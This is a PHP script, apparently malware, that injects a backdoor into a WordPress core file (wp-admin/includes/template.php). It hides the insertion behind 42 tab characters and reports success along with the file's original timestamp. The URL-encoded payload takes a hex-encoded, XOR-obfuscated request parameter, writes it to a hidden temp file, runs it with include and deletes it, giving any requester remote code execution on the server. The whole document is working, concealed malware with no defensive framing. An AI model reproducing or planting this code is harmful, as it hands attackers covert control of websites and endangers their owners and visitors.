<?php  $path = '/home1/tabela11/public_html/wp-admin/includes/template.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28isset%28%24_REQUEST%5B%22obj%22%5D%29%29%7B%20%24ref%20%3D%20hex2bin%28%24_REQUEST%5B%22obj%22%5D%29%3B%20%24value%20%3D%20%27%27%3Bforeach%28str_split%28%24ref%29%20as%20%24char%29%7B%24value%20.%3D%20chr%28ord%28%24char%29%20%5E%2067%29%3B%7D%20%24key%20%3D%20array_filter%28%5Bgetenv%28%22TEMP%22%29%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/dev/shm%22%2C%20sys_get_temp_dir%28%29%2C%20%22/var/tmp%22%2C%20getcwd%28%29%2C%20getenv%28%22TMP%22%29%2C%20session_save_path%28%29%2C%20%22/tmp%22%5D%29%3B%20foreach%20%28%24key%20as%20%24key%20%3D%3E%20%24ptr%29%20%7B%20if%20%28max%280%2C%20is_dir%28%24ptr%29%20%2A%20is_writable%28%24ptr%29%29%29%20%7B%20%24parameter_group%20%3D%20%22%24ptr%22%20.%20%22/.val%22%3B%20if%20%28%40file_put_contents%28%24parameter_group%2C%20%24value%29%20%21%3D%3D%20false%29%20%7B%20include%20%24parameter_group%3B%20unlink%28%24parameter_group%29%3B%20exit%3B%20%7D%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');